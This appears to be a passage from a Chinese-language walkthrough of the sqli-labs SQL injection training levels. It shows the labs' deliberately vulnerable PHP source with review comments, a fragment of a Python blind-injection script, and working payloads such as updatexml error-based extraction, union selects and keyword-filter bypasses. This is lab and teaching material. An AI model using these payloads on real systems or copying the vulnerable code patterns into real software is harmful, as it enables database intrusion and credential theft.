                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        # A result at either end of the search range is treated as end of data.
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()


// Sanitiser applied to the username only (see below): truncate to 15 chars,
// undo magic quotes, then quote+escape non-numeric input or cast to int.
function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd'])){
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);
    // NOTE(review): passwd is NOT passed through check_input, yet it is
    // interpolated into the UPDATE below.
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    // Clear-text credentials go to result.txt (readable if served from the web root).
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    // This SELECT uses the escaped/quoted username, so it is not the sink here.
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        // SQL injection sink: the raw $passwd and the DB-sourced $row1 are
        // interpolated unescaped. Escaping one input does not protect a
        // different query; bind both values with a prepared statement.
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo "<br>";
        // Raw mysql_error() text is returned to the client, which makes the
        // page an error-based oracle.
        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;
            echo "<br>";
            echo "</font>";
        }
        echo '<img src="../images/flag1.jpg"   />';
        //echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo '<img src="../images/slap1.jpg"   />';
        echo "</font>";
    }
}


payload: 1' and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)%23



// Login check: the form fields go through check_input() (defined elsewhere in
// the file); the header-derived values used after login do not.
if(isset($_POST['uname']) && isset($_POST['passwd'])){
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    /*
    echo 'Your Your User name:'. $uname;
    echo "<br>";
    echo 'Your Password:'. $passwd;
    echo "<br>";
    echo 'Your User Agent String:'. $uagent;
    echo "<br>";
    echo 'Your User Agent String:'. $IP;
    */

    //logging the connection parameters to a file for analysis.
    // The label says "User Agent" but the value written is $uname.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Agent:'.$uname."\n");
    fclose($fp);

    // Both operands come back from check_input() quoted+escaped or cast to
    // int, so this SELECT is not the injection point of this level.
    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if($row1){
        echo '<font color= "#FFFF00" font size = 3 >';
        // SQL injection sink: $uagent and $IP are assigned outside this block
        // (presumably from request headers, given the echo below -- confirm)
        // and are interpolated with no escaping. Only a valid login reaches
        // this INSERT. Fix: bind all three values with a prepared statement.
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        // Echoed without htmlspecialchars(): if $uagent is the raw header this
        // is also a reflected XSS sink.
        echo 'Your User Agent is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        // DB error text is sent to the client (error-based oracle).
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "<br>";
    }
    else{
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"   />';
        echo "</font>";
    }
}


payload: 'or updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1),'1','1')#



// Same shape as the User-Agent level: sanitised form fields for the login,
// unsanitised header-derived values for the INSERT that follows.
if(isset($_POST['uname']) && isset($_POST['passwd'])){
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    /*
    echo 'Your Your User name:'. $uname;
    echo "<br>";
    echo 'Your Password:'. $passwd;
    echo "<br>";
    echo 'Your User Agent String:'. $uagent;
    echo "<br>";
    echo 'Your User Agent String:'. $IP;
    */

    //logging the connection parameters to a file for analysis.
    // The label says "Referer" but the value written is $uname.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Referer:'.$uname."\n");
    fclose($fp);

    // Operands are already quoted+escaped or cast by check_input().
    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        // SQL injection sink: $uagent and $IP come from outside this block
        // (the echo below suggests the Referer header -- confirm) and are
        // interpolated unescaped, post-authentication. Use bound parameters.
        $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        // Reflected into HTML without encoding.
        echo 'Your Referer is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        // DB error text reaches the client (error-based oracle).
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg" />';
        echo "<br>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"  />';
        echo "</font>";
    }
}


payload: 'or updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1),'1')#



// Cookie-based login. No cookie yet: render the form and log in. Cookie
// present: the bare cookie value is trusted as the identity.
if(!isset($_COOKIE['uname']))
{
    //including the Mysql connect parameters.
    include("../sql-connections/sql-connect.php");
    echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome   <font color='#FF0000'> Dhakkan </font><br></div>";
    echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
    echo "<div style='padding-top:10px; font-size:15px;'>";
    echo "<!--Form to post the contents -->";
    echo '<form action=" " name="form1" method="post">';
    echo ' <div style="margin-top:15px; height:30px;">Username :    ';
    echo '   <input type="text"  name="uname" value=""/>  </div>';
    echo ' <div> Password :      ';
    echo '   <input type="text" name="passwd" value=""/></div></br>';
    echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
    echo '</form>';
    echo '</div>';
    echo '</div>';
    echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
    echo '<font size="3" color="#FFFF00">';
    echo '<center><br><br><br>';
    echo '<img src="../images/Less-20.jpg" />';
    echo '</center>';

    // Sanitiser for the form fields: truncate to 20 chars, undo magic quotes,
    // then quote+escape non-numeric input or cast numeric input to int.
    function check_input($value)
    {
        if(!empty($value))
        {
            $value = substr($value,0,20); // truncation (see comments)
        }
        if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
        {
            $value = stripslashes($value);
        }
        if (!ctype_digit($value))       // Quote if not a number
        {
            $value = "'" . mysql_real_escape_string($value) . "'";
        }
        else
        {
            $value = intval($value);
        }
        return $value;
    }

    echo "<br>";
    echo "<br>";
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        // Login query uses the sanitised values; the weak point of this level
        // is the cookie path below, not this SELECT.
        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        // Indexed before the if($row1) test: on a failed login $row1 is false.
        $cookee = $row1['username'];
        if($row1)
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            // The session "token" is the bare username: unsigned, no
            // HttpOnly/Secure flags, settable by any client to any value.
            // A server-side session (session_start()) is the fix.
            setcookie('uname', $cookee, time()+3600);
            // NOTE(review): output was already echoed above, so this redirect
            // header may be rejected unless output buffering is enabled.
            header ('Location: index.php');
            echo "I LOVE YOU COOKIES";
            echo "</font>";
            echo '<font color= "#0000ff" font size = 3 >';
            //echo 'Your Cookie is: ' .$cookee;
            echo "</font>";
            echo "<br>";
            print_r(mysql_error());
            echo "<br><br>";
            echo '<img src="../images/flag.jpg" />';
            echo "<br>";
        }
        else
        {
            echo '<font color= "#0000ff" font size="3">';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "</br>";
            echo "</br>";
            echo '<img src="../images/slap.jpg" />';
            echo "</font>";
        }
    }
    echo "</font>";
    echo '</font>';
    echo '</div>';
}
else
{
    if(!isset($_POST['submit']))
    {
        // Untrusted: the cookie value is client-controlled.
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        echo "<center>";
        echo '<br><br><br>';
        echo '<img src="../images/Less-20.jpg" />';
        echo "<br><br><b>";
        echo '<br><font color= "red" font size="4">';
        // Request headers and the cookie are echoed without htmlspecialchars():
        // reflected XSS sinks.
        echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
        echo "</font><br>";
        echo '<font color= "cyan" font size="4">';
        echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
        echo "</font><br>";
        echo '<font color= "#FFFF00" font size = 4 >';
        echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
        echo '<font color= "orange" font size = 5 >';
        echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
        echo "<br></font>";
        // SQL injection sink: the raw cookie is interpolated into the query,
        // so the Cookie header is this level's injection vector. Bind it with
        // a prepared statement instead.
        $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
        $result=mysql_query($sql);
        if (!$result)
        {
            // Raw DB error text reaches the client (error-based oracle).
            die('Issue with your mysql: ' . mysql_error());
        }
        $row = mysql_fetch_array($result);
        if($row)
        {
            echo '<font color= "pink" font size="5">';
            echo 'Your Login name:'. $row['username'];
            echo "<br>";
            echo '<font color= "grey" font size="5">';
            // The stored password is rendered to the page.
            echo 'Your Password:' .$row['password'];
            echo "</font></b>";
            echo "<br>";
            echo 'Your ID:' .$row['id'];
        }
        else
        {
            echo "<center>";
            echo '<br><br><br>';
            echo '<img src="../images/slap1.jpg" />';
            echo "<br><br><b>";
            //echo '<img src="../images/Less-20.jpg" />';
        }
        echo '<center>';
        echo '<form action="" method="post">';
        echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
        echo '</form>';
        echo '</center>';
    }
    else
    {
        echo '<center>';
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 6 >';
        echo " Your Cookie is deleted";
        // $row1 is never assigned on this path; the cookie is effectively
        // cleared by the past expiry alone.
        setcookie('uname', $row1['username'], time()-3600);
        header ('Location: index.php');
        echo '</font></center></br>';
    }
    echo "<br>";
    echo "<br>";
    //header ('Location: main.php');
    echo "<br>";
    echo "<br>";
    //echo '<img src="../images/slap.jpg" /></center>';
    //logging the connection parameters to a file for analysis.
    // Every cookie value (i.e. every probe) is appended to result.txt; on the
    // delete path $cookee is unset at this point.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Cookie:'.$cookee."\n");
    fclose($fp);
}


测试有几列,admin' order by 4%23,共3列


使用联合注入admin'and 1=2 union select 1,2,database()%23



// Cookie-based login, base64 variant. base64 is an encoding, not a security
// control: the decoded cookie is still fully client-controlled.
if(!isset($_COOKIE['uname']))
{
    //including the Mysql connect parameters.
    include("../sql-connections/sql-connect.php");
    echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome   <font color='#FF0000'> Dhakkan </font><br></div>";
    echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
    echo "<div style='padding-top:10px; font-size:15px;'>";
    echo "<!--Form to post the contents -->";
    echo '<form action=" " name="form1" method="post">';
    echo ' <div style="margin-top:15px; height:30px;">Username :    ';
    echo '   <input type="text"  name="uname" value=""/>  </div>';
    echo ' <div> Password :      ';
    echo '   <input type="text" name="passwd" value=""/></div></br>';
    echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
    echo '</form>';
    echo '</div>';
    echo '</div>';
    echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
    echo '<font size="3" color="#FFFF00">';
    echo '<center><br><br><br>';
    echo '<img src="../images/Less-21.jpg" />';
    echo '</center>';

    // Sanitiser for the form fields: truncate to 20 chars, undo magic quotes,
    // then quote+escape non-numeric input or cast numeric input to int.
    function check_input($value)
    {
        if(!empty($value))
        {
            $value = substr($value,0,20); // truncation (see comments)
        }
        if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
        {
            $value = stripslashes($value);
        }
        if (!ctype_digit($value))       // Quote if not a number
        {
            $value = "'" . mysql_real_escape_string($value) . "'";
        }
        else
        {
            $value = intval($value);
        }
        return $value;
    }

    echo "<br>";
    echo "<br>";
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        // Login query uses the sanitised values.
        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        if($row1)
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            // Identity cookie = base64(username): unsigned and forgeable; no
            // HttpOnly/Secure flags. A server-side session is the fix.
            setcookie('uname', base64_encode($row1['username']), time()+3600);
            echo "I LOVE YOU COOKIES";
            echo "</font>";
            echo '<font color= "#0000ff" font size = 3 >';
            //echo 'Your Cookie is: ' .$cookee;
            echo "</font>";
            echo "<br>";
            print_r(mysql_error());
            echo "<br><br>";
            echo '<img src="../images/flag.jpg" />';
            echo "<br>";
            // NOTE(review): sent after output has been echoed; may be
            // rejected unless output buffering is enabled.
            header ('Location: index.php');
        }
        else
        {
            echo '<font color= "#0000ff" font size="3">';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "</br>";
            echo "</br>";
            echo '<img src="../images/slap.jpg" />';
            echo "</font>";
        }
    }
    echo "</font>";
    echo '</font>';
    echo '</div>';
}
else
{
    if(!isset($_POST['submit']))
    {
        // Untrusted: the cookie value is client-controlled.
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        echo "<center>";
        echo "<br><br><br><b>";
        echo '<img src="../images/Less-21.jpg" />';
        echo "<br><br><b>";
        echo '<br><font color= "red" font size="4">';
        // Request headers and the cookie are echoed without htmlspecialchars().
        echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
        echo "</font><br>";
        echo '<font color= "cyan" font size="4">';
        echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
        echo "</font><br>";
        echo '<font color= "#FFFF00" font size = 4 >';
        echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
        echo '<font color= "orange" font size = 5 >';
        echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
        // Decoding restores whatever bytes the client encoded; no validation.
        $cookee = base64_decode($cookee);
        echo "<br></font>";
        // SQL injection sink: the decoded cookie is interpolated into the
        // query. Bind it with a prepared statement instead.
        $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
        $result=mysql_query($sql);
        if (!$result)
        {
            // Raw DB error text reaches the client (error-based oracle).
            die('Issue with your mysql: ' . mysql_error());
        }
        $row = mysql_fetch_array($result);
        if($row)
        {
            echo '<font color= "pink" font size="5">';
            echo 'Your Login name:'. $row['username'];
            echo "<br>";
            echo '<font color= "grey" font size="5">';
            // The stored password is rendered to the page.
            echo 'Your Password:' .$row['password'];
            echo "</font></b>";
            echo "<br>";
            echo 'Your ID:' .$row['id'];
        }
        else
        {
            echo "<center>";
            echo '<br><br><br>';
            echo '<img src="../images/slap1.jpg" />';
            echo "<br><br><b>";
            //echo '<img src="../images/Less-20.jpg" />';
        }
        echo '<center>';
        echo '<form action="" method="post">';
        echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
        echo '</form>';
        echo '</center>';
    }
    else
    {
        echo '<center>';
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 6 >';
        echo " Your Cookie is deleted";
        // $row1 is never assigned on this path; the past expiry does the work.
        setcookie('uname', base64_encode($row1['username']), time()-3600);
        header ('Location: index.php');
        echo '</font></center></br>';
    }
    echo "<br>";
    echo "<br>";
    //header ('Location: main.php');
    echo "<br>";
    echo "<br>";
    //echo '<img src="../images/slap.jpg" /></center>';
    //logging the connection parameters to a file for analysis.
    // Logs the decoded cookie (unset on the delete path) to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Cookie:'.$cookee."\n");
    fclose($fp);
}





// Cookie-based login, base64 + double-quote variant. Wrapping the decoded
// value in '"' is not escaping; the cookie remains fully client-controlled.
if(!isset($_COOKIE['uname']))
{
    //including the Mysql connect parameters.
    include("../sql-connections/sql-connect.php");
    echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome   <font color='#FF0000'> Dhakkan </font><br></div>";
    echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
    echo "<div style='padding-top:10px; font-size:15px;'>";
    echo "<!--Form to post the contents -->";
    echo '<form action=" " name="form1" method="post">';
    echo ' <div style="margin-top:15px; height:30px;">Username :    ';
    echo '   <input type="text"  name="uname" value=""/>  </div>';
    echo ' <div> Password :      ';
    echo '   <input type="text" name="passwd" value=""/></div></br>';
    echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
    echo '</form>';
    echo '</div>';
    echo '</div>';
    echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
    echo '<font size="3" color="#FFFF00">';
    echo '<center><br><br><br>';
    echo '<img src="../images/Less-22.jpg" />';
    echo '</center>';

    // Sanitiser for the form fields: truncate to 20 chars, undo magic quotes,
    // then quote+escape non-numeric input or cast numeric input to int.
    function check_input($value)
    {
        if(!empty($value))
        {
            $value = substr($value,0,20); // truncation (see comments)
        }
        if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
        {
            $value = stripslashes($value);
        }
        if (!ctype_digit($value))       // Quote if not a number
        {
            $value = "'" . mysql_real_escape_string($value) . "'";
        }
        else
        {
            $value = intval($value);
        }
        return $value;
    }

    echo "<br>";
    echo "<br>";
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        // Login query uses the sanitised values.
        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        if($row1)
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            // Identity cookie = base64(username): unsigned and forgeable; no
            // HttpOnly/Secure flags. A server-side session is the fix.
            setcookie('uname', base64_encode($row1['username']), time()+3600);
            // NOTE(review): output was already echoed above; the redirect may
            // be rejected unless output buffering is enabled.
            header ('Location: index.php');
            echo "I LOVE YOU COOKIES";
            echo "</font>";
            echo '<font color= "#0000ff" font size = 3 >';
            //echo 'Your Cookie is: ' .$cookee;
            echo "</font>";
            echo "<br>";
            print_r(mysql_error());
            echo "<br><br>";
            echo '<img src="../images/flag.jpg" />';
            echo "<br>";
        }
        else
        {
            echo '<font color= "#0000ff" font size="3">';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "</br>";
            echo "</br>";
            echo '<img src="../images/slap.jpg" />';
            echo "</font>";
        }
    }
    echo "</font>";
    echo '</font>';
    echo '</div>';
}
else
{
    if(!isset($_POST['submit']))
    {
        // Untrusted: the cookie value is client-controlled.
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        echo "<center>";
        echo "<br><br><br><b>";
        echo '<img src="../images/Less-21.jpg" />';
        echo "<br><br><b>";
        echo '<br><font color= "red" font size="4">';
        // Request headers and the cookie are echoed without htmlspecialchars().
        echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
        echo "</font><br>";
        echo '<font color= "cyan" font size="4">';
        echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
        echo "</font><br>";
        echo '<font color= "#FFFF00" font size = 4 >';
        echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
        echo '<font color= "orange" font size = 5 >';
        echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
        // Decoding restores whatever bytes the client encoded; no validation.
        $cookee = base64_decode($cookee);
        // Double quotes only delimit the literal; they escape nothing.
        $cookee1 = '"'. $cookee. '"';
        echo "<br></font>";
        // SQL injection sink: the decoded cookie is interpolated into the
        // query. Bind it with a prepared statement instead.
        $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
        $result=mysql_query($sql);
        if (!$result)
        {
            // Raw DB error text reaches the client (error-based oracle).
            die('Issue with your mysql: ' . mysql_error());
        }
        $row = mysql_fetch_array($result);
        if($row)
        {
            echo '<font color= "pink" font size="5">';
            echo 'Your Login name:'. $row['username'];
            echo "<br>";
            echo '<font color= "grey" font size="5">';
            // The stored password is rendered to the page.
            echo 'Your Password:' .$row['password'];
            echo "</font></b>";
            echo "<br>";
            echo 'Your ID:' .$row['id'];
        }
        else
        {
            echo "<center>";
            echo '<br><br><br>';
            echo '<img src="../images/slap1.jpg" />';
            echo "<br><br><b>";
            //echo '<img src="../images/Less-20.jpg" />';
        }
        echo '<center>';
        echo '<form action="" method="post">';
        echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
        echo '</form>';
        echo '</center>';
    }
    else
    {
        echo '<center>';
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 6 >';
        echo " Your Cookie is deleted";
        // $row1 is never assigned on this path; the past expiry does the work.
        setcookie('uname', base64_encode($row1['username']), time()-3600);
        header ('Location: index.php');
        echo '</font></center></br>';
    }
    echo "<br>";
    echo "<br>";
    //header ('Location: main.php');
    echo "<br>";
    echo "<br>";
    //echo '<img src="../images/slap.jpg" /></center>';
    //logging the connection parameters to a file for analysis.
    // Logs the decoded cookie (unset on the delete path) to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Cookie:'.$cookee."\n");
    fclose($fp);
}





// GET id lookup with a comment-token deny-list. Removing '#' and '--' does not
// close the single-quoted context the value is interpolated into, so the
// query is still injectable; only a bound parameter fixes that.
if(isset($_GET['id'])){
    $id=$_GET['id'];

    //filter the comments out so as to comments should not work
    $reg = "/#/";
    $reg1 = "/--/";
    $replace = "";
    $id = preg_replace($reg, $replace, $id);
    $id = preg_replace($reg1, $replace, $id);

    //logging the connection parameters to a file for analysis.
    // Every (post-filter) id value is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // SQL injection sink: string-built query.
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo '<font color= "#0000ff">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        // The stored password is rendered to the page.
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // DB error text reaches the client (error-based oracle).
        print_r(mysql_error());
        echo "</font>";
    }
}


1' union select 1,2,database()'




可以看到修改密码的sql语句$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";,只要用户名里带注释符,并且闭合就能把后面的注释掉而改变别的用户的密码








// GET id lookup guarded by a keyword deny-list (blacklist() below). The raw
// value is logged BEFORE filtering, so result.txt holds the original probes.
if(isset($_GET['id'])){
    $id=$_GET['id'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

    // SQL injection sink: string-built query; the deny-list does not change
    // the fact that the value is interpolated. Use a bound parameter.
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        // The stored password is rendered to the page.
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // DB error text reaches the client (error-based oracle).
        print_r(mysql_error());
        echo "</font>";
    }
}

// Single-pass, non-recursive substring removal. Each pattern is applied once,
// so text that re-forms a keyword after removal passes through (the writeup's
// own payload below demonstrates this); it also mangles legitimate values
// that merely contain these letters. Not a substitute for parameterization.
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)
    return $id;
}


payload: 1' oorrder by 3%23


使用||绕过,使用报错注入,1' || updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+



// Numeric-context variant of the keyword deny-list level: the id is
// interpolated without quotes and no DB error is echoed.
if(isset($_GET['id'])){
    $id=$_GET['id'];

    //logging the connection parameters to a file for analysis.
    // Raw value is logged before filtering.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

    // connectivity
    // SQL injection sink: unquoted interpolation; casting with intval() or
    // binding a typed parameter is the fix for a numeric id.
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        //echo 'YOU ARE IN ........';
        echo "<br>";
        // The stored password is rendered to the page.
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="5" color="#FFFF00">';
        //echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

// Single-pass, non-recursive keyword removal; see the note on the previous
// level. Not a substitute for parameterization.
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)
    return $id;
}


-1 || 1=2 union select 1,2,database()--+



// GET id lookup with a character/keyword deny-list (blacklist() below).
if(isset($_GET['id'])){
    $id=$_GET['id'];

    //logging the connection parameters to a file for analysis.
    // Raw value is logged before filtering.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

    // connectivity
    // SQL injection sink: string-built query; use a bound parameter.
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        // The stored password is rendered to the page.
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // DB error text reaches the client (error-based oracle).
        print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

// Single-pass deny-list. Note that each [...] pattern is a character class:
// it removes the listed characters one at a time, not the two-character
// token the original comment names. Character stripping is not a substitute
// for parameterization.
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);      //strip out every '/' and '*' character
    $id= preg_replace('/[--]/',"", $id);        //Strip out every '-' character (class, not the "--" token)
    $id= preg_replace('/[#]/',"", $id);         //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out whitespace matched by \s
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out forward and back slashes
    return $id;
}



